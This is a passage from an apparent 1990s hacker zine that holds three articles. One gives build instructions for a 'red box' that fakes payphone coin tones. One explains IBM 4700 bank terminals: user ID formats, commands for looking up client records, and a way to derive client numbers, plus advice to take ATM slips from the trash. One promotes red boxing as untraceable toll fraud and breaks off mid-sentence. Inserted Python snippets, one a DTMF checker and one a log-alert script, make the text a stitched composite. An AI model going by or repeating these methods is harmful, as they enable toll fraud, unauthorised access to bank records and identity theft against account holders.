but the timing depends on an external crystal oscillator. And the only     
external component we have is the 3.579545 MHz crystal: right here we have 
a "white box," as a white box is supposed to generate the DTMF "Touch-Tone"
tones. Now if we replaced the 3.579545 MHz crystal with a 6.5536 MHz one,
our "*" key on the key-pad will actually be DARN close to 3900 Hertz, the
EXACT frequency that a coin generates when being entered inside the
payphone. So in reality instead of putting in $0.25 you can put these tones
on the mouth piece and fool the Bell System.
                                                                           
                                                                           
Brief Operation                                                            
~~~~~~~~~~~~~~~                                                            
When entering a $0.25 into a payphone, the only way the phone company knows
that you entered money is by a tone which consists of a 700 Hz + 2200 Hz
(3900 Hz) being flushed into the line. For a quarter you will need 3900 Hz
for 35ms in length and a pause for 35ms and then 3900 Hz for 35ms then a
pause...etc. This must be produced exactly FIVE times, so you should have
five tones of 3900 Hz of 35ms with pauses of 35ms between each.
                                                                           
Our DTMF generator contains a ten-number memory. When we save a number into
the DTMF memory and replay it, the redial timing will play the tone for    
72.3ms and pause for 72.3ms before going to the next tone and playing that 
for 72.3ms! Now the tones will be played at this speed ONLY with the       
3.579545 MHz crystal, as the crystal controls ALL LOGIC and TONE GENERATING
TIMING! So when this is replaced with a 6.5536 MHz crystal it naturally
will be a lot faster and the timing will be faster. As a matter of fact the
timing is NOW 34.3ms! So anything redialled by the DTMF generator will come
out at 34.3ms and a pause for 34.3ms. Our "*" key will also sound very
close to the 700 + 2200 Hz, and therefore saving "*" 5 times in a memory
and redialling it will result in it sounding like a $0.25; all one has to
do is put the red box to the payphone mouth piece and the phone system will
think
you entered a valid $0.25.                                                 
                                                                           
                                                                           
 _____________________                                                     
/ General Description \____________________________________________________
                                                                           
Features                                                                   
~~~~~~~~                                                                   
   ■ 2.5V-12V operation when generating tones, which is A LOT              
     less voltage needed, compared to several white boxes I've             
     seen which ask for 16V-24V.                                           
   ■ Stores and auto-dials ten 16-digit numbers.                           
   ■ Last number redial.                                                   
   ■ Scratchpad, meaning number storage without dialling.                  
   ■ 14 Keys, separate storage and redial buttons.                         
   ■ 2-digit overwrite for PBX access codes.                               
   ■ Low harmonic distortion.                                              
   ■ Single-contact or negative-common (2-of-8) key-pad inputs.            
                                                                           
Well, before we begin I must say that replacing the 3.579545 MHz crystal
with a 6.5536 MHz one will give us the 3900 Hertz tone ONLY on the "*" key.
With this in mind, the same is true for any key on the keypad! In fact my
calculations proved that in order to get an EXACT 3900 Hertz on the "*"
key we would need a crystal of about 6.4857 MHz. However, expecting a
6.4857 MHz crystal to be in production is asking for a little too much, so
naturally we settle for the closest one possible to it; besides, analog
signals are quite difficult to simulate exactly, compared to digital,
which is always exact!
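
An added example, not part of the original article: since every tone is
derived from the crystal, a re-clocked generator shifts each key's tone pair
by the same ratio, and a receiver that measures the pair can see that it no
longer sits on the DTMF grid. The DTMF frequencies are the standard keypad
values; the 8 kHz sample rate, the +/-1.5 % accept window, the 50 ms
constructed bursts and all function names are assumptions of this sketch.

```python
import math

NOMINAL_XTAL_HZ = 3_579_545              # crystal named in the article
ROWS = (697.0, 770.0, 852.0, 941.0)      # standard DTMF low-group tones, Hz
COLS = (1209.0, 1336.0, 1477.0, 1633.0)  # standard DTMF high-group tones, Hz
KEYS = ("123A", "456B", "789C", "*0#D")
ACCEPT_TOL = 0.015   # assumed receiver accept window: +/-1.5 % per tone
SAMPLE_RATE = 8000   # Hz, assumed telephone-grade sampling


def key_tones(key, xtal_hz=NOMINAL_XTAL_HZ):
    """Tone pair a crystal-clocked generator emits for `key`.

    Both tones come from dividing the oscillator, so they scale
    linearly with the crystal frequency.
    """
    if len(key) != 1:
        raise ValueError(f"not a keypad key: {key!r}")
    scale = xtal_hz / NOMINAL_XTAL_HZ
    for r, row in enumerate(KEYS):
        c = row.find(key)
        if c >= 0:
            return ROWS[r] * scale, COLS[c] * scale
    raise ValueError(f"not a keypad key: {key!r}")


def synth(freqs, ms):
    """Constructed test signal: equal-amplitude sines for `ms` milliseconds."""
    n = int(SAMPLE_RATE * ms / 1000)
    return [sum(math.sin(2 * math.pi * f * i / SAMPLE_RATE) for f in freqs)
            for i in range(n)]


def goertzel_power(samples, freq):
    """Signal power at one frequency (Goertzel recurrence)."""
    coeff = 2 * math.cos(2 * math.pi * freq / SAMPLE_RATE)
    s1 = s2 = 0.0
    for x in samples:
        s0 = x + coeff * s1 - s2
        s2, s1 = s1, s0
    return s1 * s1 + s2 * s2 - coeff * s1 * s2


def measure_pair(samples, lo=600, hi=3000, step=2):
    """Return the two dominant frequencies (low, high) or None."""
    spectrum = [(goertzel_power(samples, f), f)
                for f in range(lo, hi + 1, step)]
    p1, f1 = max(spectrum)
    # second peak must lie outside the first peak's main lobe
    p2, f2 = max((p, f) for p, f in spectrum if abs(f - f1) > 100)
    if p1 <= 0 or p2 < 0.1 * p1:       # silence or a single tone
        return None
    return tuple(sorted((f1, f2)))


def _match(freq, grid):
    """Index of the grid tone within ACCEPT_TOL of freq, else None."""
    for i, nominal in enumerate(grid):
        if abs(freq - nominal) <= ACCEPT_TOL * nominal:
            return i
    return None


def classify(samples):
    """Decode a burst to a keypad key, or None if it is off the DTMF grid."""
    pair = measure_pair(samples)
    if pair is None:
        return None
    r, c = _match(pair[0], ROWS), _match(pair[1], COLS)
    if r is None or c is None:
        return None
    return KEYS[r][c]


if __name__ == "__main__":
    for xtal in (NOMINAL_XTAL_HZ, 6_553_600):
        tones = key_tones("*", xtal)
        burst = synth(tones, 50)
        print(f"{xtal / 1e6:.6f} MHz  '*' -> {tones[0]:.1f} + {tones[1]:.1f} Hz,"
              f" measured {measure_pair(burst)}, decoded {classify(burst)!r}")
```

With the nominal crystal the burst decodes as "*"; with the 6.5536 MHz
crystal the same key lands near 1723 Hz and 2213 Hz and is rejected as DTMF.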
                                                                           
This IC is from "National Semiconductor Corporation" model number TP5660.  
Perhaps even the exact IC in the Radio-Shack Pocket Dialer with Memory,    
as the one without memory uses the TP5650 which is this exact IC but       
without memory! The Operating temperature is -30°C to +60°C. This IC       
looks like so:                                                             
                                                                           
                          1┌─────┬──┬──────┐16                             
                      Vdd──┤     └──┘      ├───TONE OUT                    
                          2│ National      │15                             
                       Vm──┤ Semiconductor ├───Row 5                       
                          3│ (Linear       │14                             
                    Col 1──┤  Databook)    ├───Row 1                       
                          4│               │13                             
                    Col 2──┤               ├───Row 2                       
                          5│    TP5660     │12                             
                    Col 3──┤               ├───Row 3                       
                          6│               │11                             
                      Vss──┤               ├───Row 4                       
                          7│               │10                             
 ┌─────────────────OSC─IN──┤               ├───MUTE OUT                    
┬┴┬ 3.579545 Mhz Crystal  8│               │9                              
┴┬┴ Control OSC. ┌OSC─OUT──┤               ├───Col 4                       
 └───────────────┘         └───────────────┘                               
                                                                          
Replace above with the below to have both Red & White Boxes in one.        
  ┌───┬────                                                                
 ┬┴┬ ┬┴┬  3.579545 Mhz                                                    
 ┴┬┴ ┴┬┴                                                                   
  └ │ ┘  If you put a two-way switch you can switch from crystal,         
   └────── to crystal, and you'll have a red and white (combo) box!       
 Your new crystal should be 6.5536 for "*" Key                             
                                                                           
                                                                           
Pin Description                                                            
~~~~~~~~~~~~~~~                                                            
Vdd (Pin 1): The positive supply to the device, referenced to              
     Vss. A power-on reset circuit ensures correct operation               
     following initial power-up.                                           
                                                                           
Vm (Pin 2): The negative terminal of the back-up battery for on-hook       
     memory retention. A low-voltage detect circuit prevents               
     misoperation of the circuit in the event of a reduction in
     the on-hook supply voltage below that required to retain              
     stored data.                                                          
                                                                           
COLUMN & ROW Scans (Pins 3, 4, 5, 9, 11, 12, 13, 14, 15): When no key is   
     closed, pull-up resistors are active on COLUMN inputs and             
     pull-down resistors are active on ROW inputs. Therefore               
     after a key is pressed the ROW pull-down resistors cause a            
     negative-true on COLUMN inputs (for standard telephone                
     key-pads negative-common).                                            
                                                                           
Vss (pin 6): The negative supply to the device in the off-hook             
     state.                                                                
                                                                           
OSC IN, OSC OUT (pin 7, 8): All logic and tone generator timing is         
     derived from the on-chip oscillator circuit.                          
                                                                           
MUTE OUT (pin 10): This is a CMOS output which sinks current to
     Vss when no tones are being generated and sources current             
     from Vdd when tones are being generated.                              
                                                                           
TONE OUT (pin 16): This output is the open emitter of an NPN               
     transistor. The other pin (collector) is connected with the           
     Vdd.                                                                  
                                                                           
Well, this is the exact pin description according to the abilities and     
limitations of this IC. Now this Integrated Circuit (IC) was designed to   
be powered by the telephone line and a battery to keep the memory intact.  
Well, due to the fact that we are powering this circuit by battery you can 
feed both Vm and Vss to the same negative supply, the battery, of course.  
Now the MUTE OUT pin is perhaps also bothering you; well, this circuit was
designed to drive a simple interface circuit to mute the receiver when any
key is depressed. Again this is NOT needed, as you will be connecting your
DTMF generator to a small speaker rather than putting it directly into the
line, which is what this circuit was designed for. All that MUTE does is
mute the receiver when you start depressing keys, so that it will not
interfere with other incoming sounds mistaken for DTMF tones. However, you
can avoid adding a speaker by un-screwing the mouth piece and feeding the
TONE-OUT and Vdd supply directly into the conventional payphones; however,
this may attract unwanted glances, so you'll be better off with a
speaker.
                                                                           
The next part is about the key-pad, perhaps complex if you plan to design
your own. Frankly, I found that time consuming; you can buy key-pads in
several electronics stores, such as Radio Shack, but I did find it in a
local electronics store. Then again, if you have an old phone I guess you
can take it from there. Now I must warn you there are TWO types of key-pads
that are widely used, and both will work on this circuit, but you need
to know which one you have in order to make corrections.

The key-pads found in most telephones are what we call STANDARD KEY-PADs.
This has to do with the way the switch is connected inside.
                                                                           
        │         Simply, when a key is depressed, it closes the           
 ──────┬┼───Row   switch but also comes in contact with the                
     │┘│         negative power supply. Thus we call this method          
   ──┤  │         NEGATIVE-COMMON or/and standard key-pad.                 
  Vss│─┤                                                                  
        Col                                                                
                                                                           
        │         As you can see, this method consists of the row          
        ├──┐      and column coming to contact (a closing of a             
        │        switch). This type of keypad we call                     
 ───────┼──■─Row  SINGLE-CONTACT key-pad.                                  
        │                                                                  
        Col                                                                
                                                                           
If you plan to build your key-pad, certainly the single-contact key-pad is
the way to go; it's a lot simpler. So if you're using a standard key-pad,
remember to connect the negative supply to the key-pad! All that's left now
is to connect the key-pad to the circuit, very easy and fast; you just
connect Col 1 to Col 1, Row 1 to Row 1, etc... You may notice that this is
a military-style key-pad, as it includes the A, B, C, D keys which you
don't find in your everyday phone key-pads. You really don't need them, so
if you don't have them don't alarm yourself, just don't connect them!
However, you will need TWO extra keys, one for the STORE command and the
other for the REDIAL, so either add an extra key or switch or whatever you
wish and connect it, like so.
                                                                           
     ┌────────────────────────────Col 1                                    
     │     ┌──────────────────────Col 2                                    
     │     │     ┌────────────────Col 3                                    
     │     │     │      ┌─────────Col 4                                    
  ┌──┴──┬──┴──┬──┴───┬──┴──┐                                               
  │  1  │  2  │  3   │  A  ├──────Row 1                                    
  ├─────┼─────┼──────┼─────┤                                               
  │  4  │  5  │  6   │  B  ├──────Row 2                                    
  ├─────┼─────┼──────┼─────┤                                               
  │  7  │  8  │  9   │  C  ├──────Row 3                                    
  ├─────┼─────┼──────┼─────┤                                               
  │  *  │  0  │  #   │  D  ├──────Row 4                                    
  ├─────┼─────┼──────┼─────┤                                               
  │Store│     │Redial│     ├──────Row 5                                    
  └─────┴─────┴──────┴─────┘                                               
                                                                           
Ahh, congrats, your DTMF Generator is now completed! If you were like
myself and added an extra switch to go from white box to red box mode,
GREAT! The only difference is that a white box needs the 3.57545 Mhz
crystal and the red box needs the corresponding crystal, so simply put a
switch and move from mode to mode. Now for the red box to work we need five
3900 hertz tones, 33 milliseconds apart and 33 milliseconds long, so you'll
need to save your key five times in memory and then simply put the box to
the mouthpiece end of the payphone and press the memory key; you have just
entered $0.25 into the payphone.
                                                                           
NOTE: I only have this working with the 6.5536 Mhz crystal. I cannot say   
that the timing interval will be exact with the other crystals; chances    
are that taking a crystal of 7.XXXXXX or 5.XXXXXX Mhz is simply too far    
from the 700 + 2200 hertz tone. Try to get the closest value to 6.50 Mhz.  
                                                                           
I didn't include the way to save the red box tone into the memory,
as you get a nice little paper when you buy the IC, but in case you don't:
you first power up the unit, press "*" (or your valid red box tone key)
five times and then you press STORE and a number in which to store it.
And to dial the stored key, press REDIAL and the number in which you
stored the red box tone! Remember the NEW crystal should be installed at
ALL times to generate the RED BOX tone! If you save the tone with your
6.XXXX Mhz intact and redial it with the 3.57545 Mhz it will not work!
                                                                           
Lastly, I recommend an "A-Cut Crystal (NTSC TV color-burst)" for both the  
3.57545 and your red box crystal. Try local components stores. You should  
find the crystal, or else look around, ask around; I did leave you with a  
few references near here where I got most of my stuff so you can try them  
out if you can't find them on your own.                                    
                                                                           
                                                                           
REFERENCE                                                                  
          Addison Ltd/Ltee                                                 
          8018 20th Avenue                                                 
          Montreal, Canada, H1Z-3S7                                        
          tel: 1-514-376-1740                                              
                                                                           
          Active Electronic Components                                     
          6080 Metropolitan East                                           
          Montreal, Canada, H1S-1A9                                        
          tel: 1-514-256-7538                                              
               1-800-363-7601 (Outside Quebec)                             
                                                                           
          Hamilton Avnet International Canada                              
          2570 Sabourin St., St-Laurent                                    
          Montreal, Canada, H4S-1M2                                        
          tel: 1-514-331-6443                                              
               1-800-361-7129 (Outside Quebec)                             
                                                                           
          National Semiconductors Corporation                              
          2900 Semiconductor Drive
          Santa Clara, California 95051, USA                               
                                                                           
     ALSO: Try out Motorola and RCA dealers. They carry lots of            
           crystals that go into TV decoders/scramblers, so there's a      
           very good chance they should have it.                           
                                                                           
The crystals don't cost more than $1.00, key-pads can be bought for $0.75,
PCBoard under $1.00, the IC goes for $2.00. The project should cost under  
$5 if you can find the supplies in local stores -- if I did in lonely      
Canada then you should have no trouble! If they don't have it, ask them to 
order it, if they ask "why?" tell them it's for a TV component, as TVs and 
related works like decoders and scramblers use NTSC TV color-burst         
crystals!                                                                  
                                                                           
NOTE: For the next InfoJournal I should have a DTMF Generator for "Caller  
IDs" (yep, you can send your own DTMF Caller ID tones), and how the        
number/name is received. So call up your local BBS with Caller ID and make 
it display 666-6666 and logon as your favourite Death-Angel character name.
Those interested in the actual project can contact myself anytime soon; of
course you must have a grasp of electronics!
                                                                           
                        Rock Steady/NuKE                                   
===========================================================================
===========================================================================
The IBM 4700 Unix Based Systems - PART I                                   
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                   
                                                                           
For those advanced hackers and perhaps "crazy" ones, the IBM 4700s are
a new light. These systems are generally one of the hottest systems one
can ever access. These systems are usually used in banks, and they are
quite WIDELY used in Canada and the USA. I cannot speak for other parts of
the world as I haven't been able to locate any of these huge systems yet!
                                                                           
In this article I will show you a quick intro on the "user-friendly"       
4700s. I have also obtained REAL sample captures in order to document      
this article better. This article is only being released on the            
"free informational" consideration, and is solely for informational        
purposes. Any attempt to carry this to a further degree can lead to        
serious penalization by the law.                                           
                                                                           
Anyhow, let's begin. Ever wonder what type of systems banks must use, when
you step inside for a darn withdrawal or deposit of your money? The banks
do contain somewhat disturbing information about yourself and do also sell
this information to others for great deals of money. Credit Bureaus are
perhaps the best organization to work with the bankers to provide
almost all the credibility a person may hold. One can easily notice if a
bank uses the nominal IBM 4700s by a fast look around inside the bank. Go
in for a transaction and look over the cashier and see if you spot any
terminals. These terminals are simply just a monitor and a keyboard, and
the name "IBM" is usually plastered all over the monitor, so you can at
least know it's an IBM Network. Many models have been introduced, each
with an added feature as the model number increases. Today the IBM 4700s
are largely used. All the systems in all the same banks are hooked into
one vast system located perhaps in the central bank head-offices, and each
individual bank will be hooked into this system during the work hours. I
don't know what system these 4700s hook up to; their speed seems like a
very old Vax system, however I do not know so I can not say exactly. My
experience is only with the station terminals (IBM 4700s).
                                                                           
The IBM 4700s nominally USED 1200/NONE Baud modems. These are perhaps due
to the fact that this system originated in the 1979-80 period. However
today many of these IBM 4700s are adding a 9600 baud modem. Starting in
1988 IBM has developed a 9600 baud modem for these IBM 4700s systems, as it
provides a faster access time and a new security feature. These modems
are known as IBM 9600 Modems Model 7861-015; these modems have CUT
possible break-ins by at least 90%. For the first time these modems were
equipped with a Data Encryption Standard (DES). During the 1988-89 period
IBM marketed these 9600 Modems at a startling $2,000 a pop to all of the
bank systems using IBMs.
                                                                           
However, before the 9600 modems, it is only fair to state that the
software was equipped with DES that would encrypt/decrypt information as
it passes through the server in/out the modem. The great improvement was
that the 9600 Modems had DES built into the hardware, and it would
encrypt/decrypt at a much faster rate compared to the older 1200.
Nevertheless expect to encounter DES Encryption. DES contains a 56-bit key;
if the key can be broken you have just accessed the largest system a
person can enter, thus generating the saying "Hacker's Heaven."
                                                                           
You must read the "Data Encryption Standard (DES)" article published in    
this InfoJournal by myself to understand that DES is POSSIBLE to break.    
Compared to Lucifer, DES is a lot easier, and remote access to a bank      
system is very possible. Nevertheless, local access can be gained by       
accessing the terminal itself within the network. I will brief you on the
functions and the workings of this IBM 4700s system.
                                                                           
One can easily know if they have access to an IBM 4700s by its logon
feature, which follows below...
                                                                           
------------------------------------                                       
IDENTICATION MODE ADMIN./MODE (4700)                                       
                                                                           
CODE DE L'USAGER / USER ID :                                               
MOT  DE PASSE    / PASSWORD:                                               
------------------------------------                                       
                                                                           
Okay, the "---" lines simply mean that whatever is in between is the
exact input/output this system gives you once connected. Now the user ID
must follow a certain pattern as that's how accounts are used in this
system. The USER ID goes like so:
                                                                           
XXX XXXXX                                                                  
│││  └────────> 5 digit number identifying the bank branch.                
││└───────────> User Letter. If the bank allows five people to access      
││              this system each will have a letter from A to E            
││              representing user #1 as A, #2 as B etc...                  
│└────────────> Access level: 1=Bank Manager (can do ALL).                 
│                             2=Bank Director (limited, can view           
│                               all but cannot make many
│                               changes, like cancel a loan).              
│                             4=Even less access where you cannot          
│                               view all, and are restricted in            
│                               changes.                                   
│                             6=View only what #4 can. No                  
│                               changing possible.                         
└───> Language use: X=English                                              
                    T=French                                               
                                                                           
An example ID would be "T6A10281" whereby 10281 is the branch bank number,
A is the first account in that bank, 6 is the level of the code and T
is the language to use (French).
                                                                           
Once inside the system you will receive a ":" as a prompt. No help is
given, but I did manage to find a few codes for you. Basically if one      
wishes to pull out a user account we can do so with the "CLTIDT6*"         
command!                                                                   
                                                                           
CLTIDT6* -> "*" Functions as an Enter key!                                 
││││││└──> The access level (View). A 4 would allow access to              
├┘│├┘│     make changes to the info displayed!                             
│ ││ └───> Separator                                                       
│ │└─────> "ID" = "IDentification requested"                               
│ └──────> Separator                                                       
└────────> "CL" = "CLient Info"                                            
                                                                           
So we can guess this will pull out the Client's ID! Doing a CLTIDT6*
we will get a screen like so:
                                                                           
-------------------------------------------------------                    
:CLTIDT6*                                                                  
::::::::        ENREGISTREMENT CLIENT PARTICULIER       ::::::::           
                                                                           
NO CLIENT :                                                                
                                                                           
NOM       :                                                                
PRENOM    :                                                                
N.A.S     :                   DATE NAISSANCE:                              
EMPLOYEUR :                             TEL :                              
-------------------------------------------------------                    
                                                                           
Unfortunately, this was a French account, so all the captures I have are in
French. Here's a quick lesson: NOM --> name; PRENOM --> given name;        
N.A.S --> Social Insurance Number (SIN); DATE NAISSANCE --> date of birth. 
                                                                           
The rest is simple. To search for a person you must try to fill in AS
MUCH as possible to search for an account! The more INFO you got the
better it is. Once you entered enough data you get two screens that are
as follows. Since this is French, I added the English translation inside
the parentheses.
                                                                           
-------------------------------------------------------                    
NO CLIENT      : (Client number)        TRANSIT: (5-digit bank #)          
NO CARTE CLIENT: (Client info number)   DEPUIS : (Client since)            
                                                                           
NOM       : (Real last name)                                               
PRENOM    : (Given name)                SEXE : (Sex)                       
                                                                           
ADRESSE NO: (Address #) RUE : (Street)             APP.:                   
    VILLE : (City)                            PROVINCE :                   
    PAYS  : (Country)                      CODE POSTAL :(Postal/ZIP code)  
    A/S   :                                     LANGUE :(Language)         
    TEL.  :                                                                
                                                                           
N.A.S : (SIN)          DATE NAISSANCE: (Birth) NO PERMIS COND.:            
:                                                                          
--------------------------------------------------------                   
                                                                           
Pressing Enter will give you the next and final screen:                    
                                                                           
--------------------------------------------------------                   
NO CLIENT :                                                                
                                                                           
              ACTUEL                    PRECEDENT                          
EMPLOYEUR   : (Current employer)        (Last employer)                    
POSTE OCCUPE: (Job title)                                                  
DATE DEBUT  : (Since)               DEBUT:(Since)   FIN:(Until)            
              CODE:     TYPE:       TYPE :                                 
TELEPHONE   :                                                              
                                                                           
MASTER CARD : (M/C card number)                                            
VISA        : (Visa card number)                                           
CARTE CLIENT: (Automatic bank card number)                                 
NO COMPTE   : (Account numbers [and balance if access >= 4])               
            :                                                              
            :                                                              
            :                                                              
:                                                                          
--------------------------------------------------------                   
                                                                           
Cont'd in Part #2
                                                                           
The IBM 4700s Unix Base Systems - PART II                                  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                  
                                                                           
Everyone can now understand exactly how powerful a 4700s System really is.
But perhaps the mind boggling truth is that this information can be easily
tapped into illegally, and such information can cause great havoc. Perhaps
the most mind boggling feature that I have found interesting is the
search/profile of a client. In this section you can search a client in the
bank with only needing VERY LITTLE information. There are six nominal ways
to search for the client's profile and they are by:
                                                                           
     1. The Client Number (Format: XXXXX#########)                         
          The "X"s represent letters and the "#"s represent numbers. In
          order to get the Client Number you could have written it down
          when getting it in the first part! But the first part demands
          lots of information on a person in order to get it. With this
          all you need is the person's last name, first letter of the
          given name and date of birth.
                                                                           
          Eg: John Smith -- Date of Birth 75-04-21                         
              Client Number = SMITJ249578001                               
          The way we got the number part is like so: take the date of birth
          and subtract it from 99-99-99. So 75-04-21 = (9-7)(9-5) -
          (9-0)(9-4) - (9-2)(9-1). The last three digits are just in case
          there are people with the same names and date of birth, kind of
          rare; 001 is usually ok, but try 002 if another guy exists.
                                                                           
     2. Client Enterprise Number (Business Client Number)                  
          Same as above but for companies.                                 
                                                                           
     3. Valid Account Number                                               
                                                                           
     4. Valid Account Number of a Term Deposit
                                                                           
     5. Automatic Teller Cards                                             
                                                                           
     6. Credit Card (M/C or VISA)                                          
                                                                           
One boggling fact is this one: when you go to an Automatic Teller Machine,
check the garbage. You will see that some people will throw away their
slips once they read the balance of the account. One DRAWBACK is that on
the slip you will see your Automatic Teller Card Number written on top!
This is particularly true for Canada's largest banks like Royal Bank,
National Bank and TD Banks that nominally use IBM 4700s! All one must do
is take your slip and ALL they need on you can be found in the 4700s
systems, and slowly you find yourself in financial trouble. Sometimes "free
information" such as these articles is written for your protection. The
world is truly ruled by little bits of 1s and 0s, and turning on the right
bits can give you access to virtually anything. The code to access this
search/profile is the "CLTPR6*" command, which will give you:
                                                                           
-------------------------------------------------------                    
:CLTPR6*                                                                   
                                                                           
     1. NO DE CLIENT PARTICULIER :           (Client #)                    
     2. NO DE CLIENT ENTREPRISE  :           (Client # comp.)              
     3. NO COMPTE BANCAIRE       :           (Bank account #)              
     4. NO COMPTE PLACEMENT      :           (Term-Lock account)           
     5. NO COMPTE CARTE CLIENT   : XXXXXX-   (Teller card number)          
     6. NO COMPTE MASTERCARD     : XXXX-     (M/C card number)             
                                                                           
--------------------------------------------------------                   
                                                                           
The "Xs" are for SET numbers; depending on what Bank system you enter, the
M/C and Teller Card always begin with the same first few digits. For
Manhattan Bank M/C begin with 5424... Of course if you enter a Royal Bank
the terminal will read VISA card number rather than M/C as Royal offers the
VISA card. A search with this will get the two screens from the last part.
There are also ways to find out loan information, or how many term deposits
one has at whatever interest rate. With the right access codes like a T2
or a T1 you can access or void any of these accounts.
                                                                           
HOWEVER: as easy as this sounds, it is quite difficult, then again not     
difficult enough! Even if you wish to close your account in any bank your
information does NOT become erased, as I demonstrated this to Pure Energy
who closed his accounts several years ago, though the information I got    
was quite old, as his address was invalid. Nevertheless I did get his date 
of birth, SIN and other information that can be used to access other       
systems in other banks to gain faster access to his accounts.              
                                                                           
Again, this seems quite easy, but I warn you not to try it; it will get you
penalized by the lawman. Anytime you try to change accounts or access
too much information the system creates a log, and alerts the
administrators.
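
The logging and alerting described above, seen from the administrator's
side. This is an added example, not part of the original article and not
IBM's software: the log line format, threshold and function names are
assumptions; only the user ID layout and the trailing access-level digit on
commands come from the article.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# User ID layout as described in the article: language (X or T), access
# level (1, 2, 4 or 6), user letter, five-digit branch, e.g. "T6A10281".
USER_ID_RE = re.compile(r"^([XT])([1246])([A-Z])(\d{5})$")
# Commands end in the access-level digit they ask for, e.g. "CLTIDT6".
COMMAND_RE = re.compile(r"^([A-Z]+)([1246])$")
LANGUAGES = {"X": "English", "T": "French"}

# Constructed sample data in an ASSUMED audit-log format:
# "<ISO timestamp> <user id> <command> client=<record id>"
SAMPLE_LOG = """\
1993-03-01T09:00:05 T6A10281 CLTIDT6 client=C001
1993-03-01T09:01:10 T6A10281 CLTIDT6 client=C002
1993-03-01T09:02:00 X4B10281 CLTIDT4 client=C003
1993-03-01T09:02:30 T6A10281 CLTIDT4 client=C002
1993-03-01T09:03:15 T6A10281 CLTPR6 client=C003
1993-03-01T09:04:40 T6A10281 CLTPR6 client=C004
1993-03-01T09:05:00 Q9Z00000 CLTIDT6 client=C005
"""


def parse_user_id(user_id):
    """Split a user ID into its fields; raise ValueError if malformed."""
    m = USER_ID_RE.match(user_id)
    if m is None:
        raise ValueError(f"bad user id: {user_id!r}")
    lang, level, letter, branch = m.groups()
    return {"language": LANGUAGES[lang], "level": int(level),
            "user": letter, "branch": branch}


def parse_command(command):
    """Return (mnemonic, requested access level) for a command."""
    m = COMMAND_RE.match(command)
    if m is None:
        raise ValueError(f"bad command: {command!r}")
    return m.group(1), int(m.group(2))


def analyze(log_text, max_lookups=3, window=timedelta(minutes=10)):
    """Return alerts as (line number, kind, detail) tuples."""
    alerts = []
    recent = defaultdict(list)   # user id -> [(timestamp, client), ...]
    flagged = set()              # users already reported for bulk lookups
    for lineno, line in enumerate(log_text.splitlines(), 1):
        parts = line.split()
        if not parts:
            continue
        try:
            ts_text, user_id, command, client = parts
            ts = datetime.fromisoformat(ts_text)
            user = parse_user_id(user_id)
            _, requested = parse_command(command)
            if not client.startswith("client="):
                raise ValueError("missing client field")
        except ValueError:
            # Unparseable IDs or commands are themselves worth a look.
            alerts.append((lineno, "MALFORMED", line))
            continue

        # Lower level number means more privilege (1 = manager). A command
        # asking for more privilege than the ID carries is a mismatch.
        if requested < user["level"]:
            alerts.append((lineno, "LEVEL_MISMATCH", user_id))

        # Sliding window: count distinct client records touched per user.
        history = recent[user_id]
        history.append((ts, client))
        history[:] = [(t, c) for t, c in history if ts - t <= window]
        distinct = {c for _, c in history}
        if len(distinct) > max_lookups and user_id not in flagged:
            flagged.add(user_id)
            alerts.append((lineno, "BULK_LOOKUP", user_id))
    return alerts


if __name__ == "__main__":
    for lineno, kind, detail in analyze(SAMPLE_LOG):
        print(f"line {lineno}: {kind}: {detail}")
```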
                                                                           
All the access commands I was able to find out are listed below:
                                                                           
     -Identification of a client                                           
      CLTIDT6 *                                                            
     -Profile of a Client
      CLTPRO6 *                                                            
     -List of active and closed loans                                      
      CTTACT6 / # Client Number                                            
     -List of account numbers of a client                                  
      CLTDPT6 / # Client Number                                            
     -List of Term Deposits of a Client                                    
      DPTCDC6 / # Client Number                                            
                                                                           
I hope you found this information useful for your own protection.
Remember, don't leave any slips from automatic tellers, and never say your
account number to a cashier; write it down and show it to them. A lot
can be done to ruin you financially with the info these systems contain.
And last but not least, I am not responsible for any attempts you make
to illegally access these systems. I know IBM will be GLAD to help you
by sending you information on these systems; of course you will have
to "pretend" you're part of a big corporation looking into their network!
                                                                           
                        Rock Steady/NuKE                                   
===========================================================================
===========================================================================
A Beginner's Guide to Red Boxing                                           
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~                                           
                                                                           
About six months ago I made my first red box, and let me tell you, this is 
the way to go. With the ever-increasing dangers of phreaking, red boxing   
provides a safe, effective alternative that is easily available to those   
with little technical knowledge and allows calls anywhere in the world with
only a small investment. Before I elaborate on how to construct your red   
box (unlike Rock Steady, I took the easy way out and used the now-famous   
Radio-Shack conversion) and list some of the "tricks of the trade," let's  
list the pros and cons of red boxing compared to other forms of phreaking. 
                                                                           
Pros                                                                       
~~~~                                                                       
* UNTRACEABLE! Fuck ESS, nothing can find you with a red box! You're just  
  an average joe using a pay phone. Even if they do catch on, you can      
  just hang up and try again... Just don't abuse the same pay phone        
  for hundreds of dollars a month and everything's cool.                   
                                                                           
* Small, easy-to-carry unit is portable, durable, and looks like a         
  legitimate pocket dialer...                                              
                                                                           
* Perfect line quality. No static, no loss of volume, etc. unlike PBXs,    
  extenders, and other commonly-abused phone systems.                      
                                                                           
* Low cost...thirty dollars gets you unlimited free calls (I estimate I've 
  "spent" over $500 so far). The only upkeep cost is new batteries every   
  few months.  There's not even any cost at all for each call you make,    
  not even local charges, as with PBXs (if applicable in your area).       
                                                                           
Cons                                                                       
~~~~                                                                       
* Simply put, it's a hassle. You have to drag yourself out to a pay phone  
  to use it. You have to keep pressing the button periodically to add more 
  "money." Such is the price for free calls, I suppose...                  
                                                                           
* Because you're using a pay phone, calls are voice-only. Not only are     
  acoustic couplers slow and laptop use unusual (ahem), but pay phones
  make a click every minute, plus you constantly get a synthesized voice   
  or operator demanding more money every so often.                         
                                                                           
* Sometimes you can get a suspicious operator... Your average operator     
  is of limited intelligence (hell, I've even told an AT&T operator what
  I'm doing, and she still didn't get it [Me: "Hi, I'd like to red box a   
  call to Paris." Bitch: "You'll be paying with quarters?" Me: "No, I'm    
  red boxing it.  It's a device for committing toll fraud."  Bitch:  "Sorry
  sir, I'm not familiar with that calling plan. Do you want to pay with    
  your calling card?" Sheesh!]. Then again, five out of five               
  randomly-sampled AT&T operators didn't know what 2600 Hz is, but that's  
  another story...) Still, it's a chance. I've gotten a few suspicious     
  operators who hassle you and return your "money" and ask you to reinsert 
  it, and even one who knew what I was doing ("Ok sir, none of your        
  quarters have registered. I'm afraid I'm going to have to report that pay
